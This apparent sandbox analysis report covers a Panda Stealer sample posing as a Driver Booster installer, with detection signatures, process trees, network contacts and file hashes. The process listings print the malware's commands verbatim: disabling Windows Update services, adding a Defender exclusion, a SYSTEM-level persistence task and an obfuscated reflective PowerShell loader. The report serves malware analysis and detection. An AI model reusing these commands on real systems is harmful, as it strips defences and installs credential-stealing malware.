Analysis Overview
SHA256
23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
Threat Level: Known bad
The file 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00 was found to be: Known bad.
Malicious Activity Summary
Panda Stealer payload
PandaStealer
Possible privilege escalation attempt
Stops running service(s)
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Modifies registry class
Modifies registry key
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-04-14 17:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-14 17:33
Reported
2024-04-14 17:47
Platform
win7-20240220-en
Max time kernel
3s
Max time network
17s
Command Line
Signatures
Panda Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
PandaStealer
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"
C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp" /SL5="$40150,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "DBassistant"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
C:\Windows\system32\schtasks.exe
schtasks /run /tn "DBassistant"
C:\Windows\system32\taskeng.exe
taskeng.exe {2C733B94-B17B-4042-ADE0-505C7207B682} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3331cd96-be95-46f9-bd19-6cee6c77ea53}
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{55144820-2c5f-4067-a015-a50dd418f139}
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | f0854165.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0854165.xsph.ru | tcp |
| US | 8.8.8.8:53 | update.iobit.com | udp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
| MD5 | ccc48304afa2e7c58492babc297db8a4 |
| SHA1 | decd98730cf34e1567965f6fb7085569fc1053e8 |
| SHA256 | e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910 |
| SHA512 | 79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04 |
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
| MD5 | 6a4308bc229b64cf5bc6d359056b8980 |
| SHA1 | 29f6484fafd50f0c00b5be01d97e82ffeda6f75b |
| SHA256 | 5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7 |
| SHA512 | f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364 |
\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
| MD5 | 68b52a0b8e3d45bf3b520a0e7f16dad1 |
| SHA1 | e50408326eafb5ca8adc70db29c33b64e25bbbbd |
| SHA256 | b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b |
| SHA512 | b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf |
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
| MD5 | 0e31bfc197cf7557b6ba5c18ecb1e5b2 |
| SHA1 | 78ec7c8f28568611cf524f30b67875e031a09cb2 |
| SHA256 | 87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78 |
| SHA512 | 700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0 |
\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp\DriverBooster.exe
| MD5 | 5ff2b8b8bf24896093f7e44374fabf95 |
| SHA1 | 69bc407fe124e7e475a90cb9702f768a4b412da3 |
| SHA256 | 77b5f3864c9ded87ccdc2c550d1ac107c918c224ee9aeada6f3fd8834f935d91 |
| SHA512 | 391ea2b19131d73f194afc2ddd594f8648e6acd9c0a7fabffcff1fb27d83ddbd91367bfbf32f7b354d31ae931dea04b73045236eb98848d65fe4de8ee02fb50e |
C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe
| MD5 | 3d403676517f6a99de035a04dc3f3f82 |
| SHA1 | ed69d8f485374dfb58a5b651b1f3f1bab8ee9541 |
| SHA256 | 668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e |
| SHA512 | 4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e |
C:\ProgramData\IObit\iobitpromotion.ini
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Temp\1713116764\ENGLISH.lng
| MD5 | 8e7f2723f0e72bc6abefca738c9c1ca4 |
| SHA1 | 969a4a6f31e146040a101d526886ede9a7c5c432 |
| SHA256 | f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b |
| SHA512 | 9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232 |
C:\Windows\Tasks\dialersvc32.job
| MD5 | 5d1e3ddd710c22a98c395c4ddf70d1d6 |
| SHA1 | 617e9fbaf1faf9d8467f918ea38175313ccd8e9e |
| SHA256 | 428ac3eb102e83da4bf95f6349fbfcdaffe44555bc1e714518982fd520356bdb |
| SHA512 | cc2bb444d351a5894af09666dbf01f608399c67a7d4debddaec96dc5ec8b87c7994543be44ec126102381aa43a0a56d8da696a8fbff90e817b5a026683fac2df |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-14 17:33
Reported
2024-04-14 17:46
Platform
win10v2004-20240412-en
Max time kernel
16s
Max time network
11s
Command Line
Signatures
Panda Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
PandaStealer
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3608 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | C:\Windows\System32\conhost.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"
C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp" /SL5="$9017E,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & 